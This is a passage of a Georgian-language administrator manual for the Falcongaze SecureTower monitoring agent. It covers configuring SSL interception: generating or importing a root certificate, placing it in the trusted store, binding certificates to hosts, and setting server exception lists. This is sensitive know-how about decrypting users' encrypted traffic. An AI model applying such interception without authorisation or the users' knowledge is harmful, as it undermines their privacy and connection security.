  • აგენტის პარამეტრების პროფილის ჩანართში, პროფილის რედაქტირების ზონაში, აირჩიეთ ქსელის ტრაფიკის კონტროლის ჩანართი.
  • დააჭირეთ ღილაკს SSL Interception Options და მიჰყევით მიმდინარე აბზაცში მოცემულ რეკომენდაციებს.
  • SSL სერთიფიკატის ჩანაცვლების რეჟიმის არჩევა

    პარამეტრების ფანჯარაში აირჩიეთ მისაღები ჩარევის რეჟიმი:

    • იმისათვის, რომ აგენტმა ავტომატურად შექმნას root SSL სერთიფიკატი მომხმარებლის კომპიუტერზე დაინსტალირებისას, აირჩიეთ ვარიანტი ავტომატური რეჟიმი. გენერირებული ძირეული სერთიფიკატი განთავსდება სანდო სერტიფიკატის გამცემის მონაცემთა ბაზაში და ავტომატურად გამოიყენებს აგენტს, რათა შემდგომში გასცეს ბავშვის სერტიფიკატები, რომლებიც ხელმოწერილია ნაგულისხმევად Falcongaze SecureTower-ის გამცემის სახელით.

    სერთიფიკატის გამცემის სახელის შესაცვლელად, რომელიც გამოჩნდება კავშირის უსაფრთხოების ინფორმაციაში, შეიყვანეთ სასურველი სახელი SSL სერთიფიკატში Name ველში.

    • მორგებული SSL სერთიფიკატის გამოსაყენებლად, როგორც ძირეული სერთიფიკატი დაშიფრული ტრაფიკის ჩარევისას, აირჩიეთ მორგებული რეჟიმი. მომხმარებლის სერთიფიკატი წინასწარ უნდა იყოს გენერირებული და დამატებული სისტემის მონაცემთა ბაზაში. სისტემის მონაცემთა ბაზიდან სერთიფიკატის დასაზუსტებლად აირჩიეთ მისი სახელი მომხმარებლის სერთიფიკატის ჩამოსაშლელ სიაში ან დააწკაპუნეთ ღილაკზე მომხმარებლის სერთიფიკატები სისტემის მონაცემთა ბაზაში სერთიფიკატის და პირადი გასაღების ფაილების დასამატებლად.

    ფანჯარაში, რომელიც იხსნება, დააწკაპუნეთ სერთიფიკატის დამატება ღილაკზე და მიუთითეთ სერტიფიკატი და ძირითადი ფაილები ერთ-ერთი შემდეგი მეთოდით:

  • ახალი სერტიფიკატის შესაქმნელად დააწკაპუნეთ ღილაკზე სერტიფიკატის გენერირება. ფანჯარაში, რომელიც იხსნება, შეიყვანეთ ახალი სერტიფიკატის სახელი, მისი მოქმედების პერიოდი და მიუთითეთ ბილიკები, სადაც შეინახება ახლად შექმნილი სერტიფიკატის ფაილები (*.cer) და პირადი გასაღები (*.pvk). დააჭირეთ ღილაკს გენერირება.
  • თუ გსურთ დაამატოთ სერთიფიკატი, რომელიც ადრე იყო გენერირებული PFX ფორმატში, დააწკაპუნეთ ღილაკზე Convert from PFX Certificate. მიუთითეთ გზა და პაროლი სერტიფიკატის ფაილის PFX ფორმატში, ასევე გზა სერტიფიკატის (*.cer) და პირადი გასაღების (*.pvk) ფაილებისკენ, რომლებშიც გსურთ საწყისი ფაილის კონვერტაცია. დააწკაპუნეთ ღილაკს Convert კონვერტაციის დასასრულებლად.
  • დააწკაპუნეთ შემდეგზე მომხმარებლის სერთიფიკატების დამატების ფანჯარაში დამატების პროცედურის გასაგრძელებლად. ფანჯარაში, რომელიც იხსნება, შეიყვანეთ უნიკალური სახელი, რომლითაც ხელმოწერილი იქნება დამატებული სერტიფიკატი და კომენტარი (სურვილისამებრ).

    დააწკაპუნეთ Finish პროცესის დასასრულებლად. სერთიფიკატი დაემატება SecureTower სისტემის მომხმარებლის სერტიფიკატების მონაცემთა ბაზას. დააწკაპუნეთ OK დამატების დასასრულებლად. დამატებული მომხმარებლის სერტიფიკატი აგენტის მიერ ავტომატურად განთავსდება სანდო შემქმნელთა მონაცემთა ბაზაში (თუ ეს ადრე არ გაკეთებულა ქსელის ადმინისტრატორის მიერ) და შემდეგ გამოყენებული იქნება ბავშვის სერთიფიკატების გასაცემად.

    შენიშვნა.

    მომხმარებლის რეჟიმის გამოყენებისას, რეკომენდირებულია, რომ ქსელის ადმინისტრატორმა გაავრცელოს მომხმარებლის სერტიფიკატი ქსელის ყველა კომპიუტერზე. ჯგუფის პოლიტიკაან ხელით. ეს უზრუნველყოფს სერთიფიკატების ავთენტიფიკაციას წარმატებით. წინააღმდეგ შემთხვევაში, სერთიფიკატი აგენტის მიერ ავტომატურად დაემატება სანდო სერტიფიკატების მაღაზიას.

    SSL სერთიფიკატის სერვერთან დაკავშირება

    სერვერ-სერთიფიკატის შესატყვისის დასადგენად, დააწკაპუნეთ ღილაკზე სერტიფიკატის შეკვრა და მიჰყევით ქვემოთ მოცემულ რეკომენდაციებს:

    • Root სერთიფიკატის კონკრეტულ სერვერზე დასაკავშირებლად, Root Certificates ჩანართზე დააწკაპუნეთ ღილაკზე სერთიფიკატის დამატება საიტისთვის. ჰოსტის სახელი (IP მისამართი) ველში შეიყვანეთ ჰოსტის სახელი (დომენის სახელი), რომელზეც გაიცემა ბავშვის სერთიფიკატები და რომელზედაც იქნება მიბმული root სერტიფიკატი. აირჩიეთ ერთ-ერთი წინასწარ დაინსტალირებული root სერთიფიკატი Root Certificate ველის ჩამოსაშლელი სიიდან, ან დააწკაპუნეთ მომხმარებლის სერთიფიკატების ღილაკზე, რათა დაამატოთ და მიუთითოთ სერტიფიკატის და პირადი გასაღების ფაილები მომხმარებლის კომპიუტერზე.
    • არსებული სერთიფიკატის კონკრეტულ სერვერზე დასაკავშირებლად აირჩიეთ მომხმარებლის სერთიფიკატების ჩანართი. აგენტი არ გამოიმუშავებს ახალ საბავშვო სერთიფიკატებს ამ ჩანართში მითითებული სერვერებისთვის, მაგრამ გამოიყენებს მომხმარებლის მიერ მითითებულ სერტიფიკატებს ჩანაცვლების პროცედურებისთვის. ფანჯარაში, რომელიც იხსნება, ჰოსტის სახელი (IP მისამართი) ველში, შეიყვანეთ ჰოსტის სახელი (დომენის სახელი), რომელზეც იქნება მიბმული სერთიფიკატი. აირჩიეთ ერთ-ერთი სერთიფიკატი ჩამოსაშლელი სიიდან სერტიფიკატი: ველში (თუ სერთიფიკატები უკვე დამატებულია ადრე) ან დააწკაპუნეთ ღილაკზე მომხმარებლის სერთიფიკატები სიიდან მომხმარებლის სერთიფიკატების შესარჩევად ან დაამატეთ და მიუთითეთ სერთიფიკატის და პირადი გასაღების ფაილები მომხმარებლის განყოფილებაში. კომპიუტერი.

    შენიშვნა.

    ჰოსტის სახელის (IP მისამართი) ველის შესავსებად შეგიძლიათ გამოიყენოთ ჰოსტის IP მისამართი, მაგრამ მხოლოდ იმ შემთხვევებში, როდესაც კავშირის დროს ჰოსტის სახელი არ იყო განსაზღვრული და მხოლოდ IP მისამართია ცნობილი.

    სერვერების გამორიცხვა დაშიფრული ტრაფიკის ჩარევისგან

    სერტიფიკატის ჩანაცვლების პროცესის გამონაკლისებთან მუშაობისთვის დააჭირეთ ღილაკს SSL Server Exceptions.

    გამონაკლისის მენეჯერის ფანჯარა აჩვენებს სერვერების (ჰოსტების) სიას, რომლებიც ნაგულისხმევად გამორიცხულია ჩანაცვლების პროცესიდან. ახალი გამონაკლისის დასამატებლად დააჭირეთ ღილაკს გამონაკლისის დამატება.

    დიალოგური ფანჯრის შეყვანის ველში, რომელიც იხსნება, შეიყვანეთ სერვერის (მასპინძლის) სახელი (მაგალითად, accounts.google.com) ასოების მიხედვით და დააწკაპუნეთ ღილაკს დამატება. სისტემა საშუალებას გაძლევთ შეიყვანოთ სახელები ნიღბის გამოყენებით (სიმბოლოები ? და * დასაშვებია, მაგალითად, *.microsoft.*-ის გამოყენებით თავიდან აიცილებთ Microsoft-ის რესურსების დუბლირებას გამორიცხვის სიაში) იმავე ოჯახის რესურსების გამორიცხვის მიზნით. თქვენ მიერ შეყვანილი სახელი გამოჩნდება გამორიცხვის სიაში.

    შემდეგი, თქვენ უნდა აირჩიოთ გამორიცხვის რეჟიმი: შეცვალეთ სერთიფიკატები მხოლოდ ზემოთ მითითებული SSL სერვერებისთვის, ან შეცვალეთ SSL სერთიფიკატები ყველა სერვერისთვის, გარდა ზემოთ მითითებული. პირველ შემთხვევაში, სისტემა ჩაანაცვლებს მხოლოდ სერვერების სერთიფიკატებს, რომლებიც ჩამოთვლილია გამორიცხვის სიაში (და, შესაბამისად, შეძლებს შესაბამისი ტრაფიკის ჩაჭრას). ყველა დანარჩენისთვის სერთიფიკატები არ შეიცვლება და შესაბამისი დაშიფრული ტრაფიკის თვალთვალი შეუძლებელი იქნება. მეორე შემთხვევაში, სისტემა ჩაანაცვლებს სერთიფიკატებს ყველა სერვერისთვის, გამონაკლისების სიაში მითითებულის გარდა.

    სხვა ოპერაციების შესასრულებლად გამონაკლისის გარდა, მიჰყევით აბზაცში მოცემულ შესაბამის რეკომენდაციებს